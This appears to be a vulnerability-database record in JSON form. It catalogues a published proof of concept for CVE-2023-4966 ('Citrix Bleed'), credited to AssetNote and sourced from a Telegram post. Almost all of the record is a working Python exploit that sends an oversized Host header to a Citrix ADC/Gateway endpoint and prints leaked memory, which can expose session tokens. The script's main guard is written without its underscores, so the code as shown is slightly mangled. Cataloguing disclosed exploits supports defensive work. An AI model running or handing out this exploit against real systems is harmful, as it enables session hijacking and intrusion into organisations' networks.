{"uuid": "9f8751b3-86c7-46bc-ac35-1d01281497e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4966", "type": "published-proof-of-concept", "source": "https://t.me/cKure/12231", "content": "Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.\n\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nimport urllib3\nimport argparse\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')\nargs = parser.parse_args()\n\nif args.target is None:\n    print('Target must be provided (e.g. --target 192.168.1.200)')\n    sys.exit(0)\n\nhostname = args.target\n\nif name == \"main\":\n    headers = {\n        \"Host\": \"a\"*24576\n    }\n    r = requests.get(f\"https://{hostname}/oauth/idp/.well-known/openid-configuration\", headers=headers, verify=False,timeout=10)\n    if r.status_code == 200:\n        print(\"--- Dumped Memory ---\")\n        print(r.text[131050:])\n        print(\"---      End      ---\")\n    else:\n        print(\"Could not dump memory\")", "creation_timestamp": "2024-01-26T16:29:14.000000Z"}